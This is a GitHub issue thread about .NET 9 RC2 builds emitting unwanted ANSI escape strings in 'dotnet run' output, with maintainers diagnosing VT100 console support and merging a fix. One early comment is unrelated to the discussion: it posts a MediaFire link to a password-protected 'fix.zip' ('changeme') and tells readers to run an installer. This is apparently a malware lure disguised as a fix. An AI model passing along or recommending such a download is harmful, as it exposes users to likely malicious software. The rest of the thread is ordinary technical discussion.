### ISSUE TITLE
[NETSDKE2E] With NET 9 RC2 SDK installed, running projects created with CLI result in unwanted strings

### ISSUE THREAD

**Issue by darrenarvin123** [dotnet/msbuild#10579] opened 2024-08-29 02:48 UTC
Build info:
9.0.100-rc.2.24428.4 (runtime-9.0.0-rc.2.24426.3)

Repro steps:
1. Download NET 9 RC2 SDK on win-x64
2. Create a console project with CLI
dotnet new console 
3. Build the console
dotnet build
4. Run the console 
dotnet run

Expected:
Project runs successfully without any unwanted strings 

Actual Result:
Unwanted strings are shown together with the output
![image](https://github.com/user-attachments/assets/99533230-e2ce-44bc-9e15-bf374ebc65ce)

dotnet --info
.NET SDK:
 Version:           9.0.100-rc.2.24428.4
 Commit:            0030622fd9
 Workload version:  9.0.100-manifests.12008748
 MSBuild version:   17.12.0-preview-24426-01+14df0589a

Runtime Environment:
 OS Name:     Windows
 OS Version:  10.0.20348
 OS Platform: Windows
 RID:         win-x64
 Base Path:   C:\Program Files\dotnet\sdk\9.0.100-rc.2.24428.4\

.NET workloads installed:
Configured to use loose manifests when installing new manifests.
There are no installed workloads to display.

Host:
  Version:      9.0.0-rc.2.24426.3
  Architecture: x64
  Commit:       static

.NET SDKs installed:
  9.0.100-rc.2.24428.4 [C:\Program Files\dotnet\sdk]

.NET runtimes installed:
  Microsoft.AspNetCore.App 6.0.32 [C:\Program Files\dotnet\shared\Microsoft.AspNetCore.App]
  Microsoft.AspNetCore.App 9.0.0-rc.2.24426.2 [C:\Program Files\dotnet\shared\Microsoft.AspNetCore.App]
  Microsoft.NETCore.App 6.0.32 [C:\Program Files\dotnet\shared\Microsoft.NETCore.App]
  Microsoft.NETCore.App 9.0.0-rc.2.24426.3 [C:\Program Files\dotnet\shared\Microsoft.NETCore.App]
  Microsoft.WindowsDesktop.App 9.0.0-rc.2.24425.1 [C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App]

Other architectures found:
  x86   [C:\Program Files (x86)\dotnet]
    registered at [HKLM\SOFTWARE\dotnet\Setup\InstalledVersions\x86\InstallLocation]

Environment variables:
  Not set

global.json file:
  Not found

Learn more:
  https://aka.ms/dotnet/info

Download .NET:
  https://aka.ms/dotnet/download

**Comment by africanobyamugisha** [comment] 2024-08-29 03:04
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by rainersigwald** [comment] 2024-08-29 15:17
Hmm, the codes are _mostly_ working though; look at all the overwriting and status type stuff here:

https://github.com/user-attachments/assets/e939639f-d744-4e8f-9dae-e63b7d88569e

What is the flow here with the new `dotnet run` changes? Is the first build part doing a normal MSBuild invocation, then a second phase that news up a TL using the reflection in the SDK, right?

If so that's falling into a trap MSBuild appears to have set. We enable ANSI processing in our entrypoint

https://github.com/dotnet/msbuild/blob/b82694a16d4963b5765e36fdc89d270fa00dde8e/src/MSBuild/XMake.cs#L2996

instead of in TL itself.

Given the cycle time would it be easier to fix this in SDK or MSBuild, @baronfel?

**Comment by baronfel** [comment] 2024-08-29 15:23
We've got 3 weeks before SDK locks down, is that enough time to diagnose and fix in MSBuild?

**Comment by rainersigwald** [comment] 2024-08-30 15:07
I would think so. @MichalPavlik?

**Comment by richaverma1** [comment] 2024-09-18 21:10
@rainersigwald any updates on this? Is this getting fixed for .NET 9 RC2?

**Comment by rainersigwald** [comment] 2024-09-18 21:21
@richaverma1 Seems pretty unlikely for RC2--unless @michalpavlik has a fix prepared I don't know about.

**Comment by MichalPavlik** [comment] 2024-09-19 08:00
Working on multiple things right now, but I will prioritize this one.

**Comment by MichalPavlik** [comment] 2024-09-23 13:58
PR was merged, so I'm closing this issue. Please reopen if needed.

**Closed by MichalPavlik** 2024-09-23 13:58 UTC
Labels: triaged

**Comment by vdanche** [comment] 2024-09-24 09:56
not repro on 9.0.100-rc.2.24470.13(runtime-9.0.0-rc.2.24463.7)
![image](https://github.com/user-attachments/assets/a6ba7509-2f68-43a8-8a1b-f7fcafd55334)

**Comment by vdanche** [comment] 2024-09-26 04:05
@MichalPavlik  so weird, today we met it again on net9 rc2 candidate build: 9.0.100-rc.2.24474.11 on EN Windows Server 2012 R2
![image](https://github.com/user-attachments/assets/448f8eb4-2c24-4eec-a406-f53b21ab47f7)

but did not meet it on EN win11-x64 with same build
![image](https://github.com/user-attachments/assets/cabd4817-31c5-43c0-a027-9557b3119fa1)

**Comment by MichalPavlik** [comment] 2024-09-26 07:05
I think I know what is the root cause here. As the .NET 9 is already in RC stage, I did a minimal change to get rid of this behavior on consoles that supports VT100. Unfortunately, Console Host in Server 2012 doesn't support VT100. This implementation was added in `Windows 10 1511` / `Windows Server 2016 TP4`.
My plan is to add more complex code to cover this scenario, but I'm not sure it could be part of .NET 9 GA. Windows Server 2012 is not officially supported anymore, so I believe the customer impact is not high enough to meet bar right now.

@baronfel , please correct me if you have different opinion.

**Comment by vdanche** [comment] 2024-10-12 02:59
> I think I know what is the root cause here. As the .NET 9 is already in RC stage, I did a minimal change to get rid of this behavior on consoles that supports VT100. Unfortunately, Console Host in Server 2012 doesn't support VT100. This implementation was added in `Windows 10 1511` / `Windows Server 2016 TP4`. My plan is to add more complex code to cover this scenario, but I'm not sure it could be part of .NET 9 GA. Windows Server 2012 is not officially supported anymore, so I believe the customer impact is not high enough to meet bar right now.
> 
> [@baronfel](https://github.com/baronfel) , please correct me if you have different opinion.

@MichalPavlik Do we need to open a new bug for winserver2012 R2 or reopen this issue?

**Comment by richaverma1** [comment] 2024-10-17 15:20
@vdanche file a new bug for winserver2012 R2 and mention this one in it.
